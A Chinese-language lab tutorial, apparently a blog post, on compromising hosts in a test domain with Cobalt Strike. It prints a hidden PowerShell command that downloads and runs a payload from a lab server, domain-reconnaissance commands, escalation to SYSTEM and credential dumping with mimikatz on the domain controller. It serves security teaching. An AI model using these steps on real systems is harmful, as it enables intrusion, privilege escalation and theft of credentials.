内网渗透-cs上线之提权测试方法

cs上线之提权测试方法

在这里我简单给大家介绍如何让目标机器上线,以及上线后如何提高系统权限的方法
这里外网渗透拿到shell的过程我就不介绍了,我直接用cs创建powershell让靶机上线
这里我们简单搭建一下环境和拓扑图
环境搭建:win7,window server 2003,kali,win10
首先我们先打开cs
打开kali服务端和win10的客服端
内网渗透-cs上线之提权测试方法_第1张图片
内网渗透-cs上线之提权测试方法_第2张图片
进入到cs
内网渗透-cs上线之提权测试方法_第3张图片我们打开监听器,这里怎么创建监听器就不介绍了,往期视频都有介绍
内网渗透-cs上线之提权测试方法_第4张图片
我们打开攻击,生成powershell
内网渗透-cs上线之提权测试方法_第5张图片
点击之前创建好的test监听器
内网渗透-cs上线之提权测试方法_第6张图片
内网渗透-cs上线之提权测试方法_第7张图片
开始攻击
powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.222.131:80/a’))”
我们吧powershell复制到靶机上打开
内网渗透-cs上线之提权测试方法_第8张图片
由于window server 2003没有安装 powershell,我们无法打开,只能通过生成后门程序进行攻击
内网渗透-cs上线之提权测试方法_第9张图片
内网渗透-cs上线之提权测试方法_第10张图片
点击程序
内网渗透-cs上线之提权测试方法_第11张图片
程序已经运行
我们去cs上看看有没有上线了
内网渗透-cs上线之提权测试方法_第12张图片
靶机上线了,接下来我们就可以进入会话,以及内网信息收集的操作了
内网渗透-cs上线之提权测试方法_第13张图片成功查看到用户的主机信息了
我们在看看对方主机是否在域内
查看域名
shell wmic computersystem get domain
shell whoami/all
shell ipconfig/all (DNS后缀)
shell net time /domain(域控的时间)
shell nslookup (域名) 查看域控的ip地址

我们可以使用上述命令进行查看域名
内网渗透-cs上线之提权测试方法_第14张图片
发现是存在域的,且域名为zhian.com
内网渗透-cs上线之提权测试方法_第15张图片
我们在看看另一台主机也在域内
这时我们再看看哪个主机是域控,使用这个命令很快就可以分辨出来
shell net time /domain
我们对win7输入
内网渗透-cs上线之提权测试方法_第16张图片
发现访问不了
在访问另外一台试试
内网渗透-cs上线之提权测试方法_第17张图片
发现访问到了,这个主机就是域控,也就是window server 2003
我们看一下拓扑图
内网渗透-cs上线之提权测试方法_第18张图片
连上了两台机器,接下来就是对机器提权了,都没有达到system权限
我们提权目的是为了可以进行更高层次的信息收集,获取用户的信息
我们先是提权为*,在提权为system就可以了
我这里的步骤说一下
获得system权限的方法
(执行,提权)
先进行smb监听,发现不行,再用tcp进行监听,(tcp1-test),(uac-token-duplication),点击开始
提升到zhian* 权限
再进行tcp监听,svc-exe模块,提升到system权限

首先对zhian进行提权为zhian*
内网渗透-cs上线之提权测试方法_第19张图片
我们对准,点击就可以了
这里选择创建好的tcp1协议,选择(uac-token-duplication)模块
内网渗透-cs上线之提权测试方法_第20张图片
内网渗透-cs上线之提权测试方法_第21张图片
内网渗透-cs上线之提权测试方法_第22张图片
我们可以看到出现了新的上线主机zhian*了
我们进一步提权为system权限,我们选择svc.exe
内网渗透-cs上线之提权测试方法_第23张图片
点击开始
内网渗透-cs上线之提权测试方法_第24张图片
输入shell whoami
内网渗透-cs上线之提权测试方法_第25张图片
发现成功提取为system权限了,接下来对域控进行提权,因为已经是管理员权限了,我们只要提升为system权限就可以了,我们只要进行第二步选择tcp协议和svc.exe就可以了
内网渗透-cs上线之提权测试方法_第26张图片
成功提权为system权限了
我们看一下拓扑图
内网渗透-cs上线之提权测试方法_第27张图片
我们查看域控的hash值
内网渗透-cs上线之提权测试方法_第28张图片点击mimikatz获得明文密码
内网渗透-cs上线之提权测试方法_第29张图片
内网渗透-cs上线之提权测试方法_第30张图片
成功获取密码,只需要解密就好了。
我们对win7进行获取hash值
内网渗透-cs上线之提权测试方法_第31张图片
内网渗透-cs上线之提权测试方法_第32张图片
成功获得用户信息,实验结束。

你可能感兴趣的:(内网渗透,安全性测试,web安全,安全)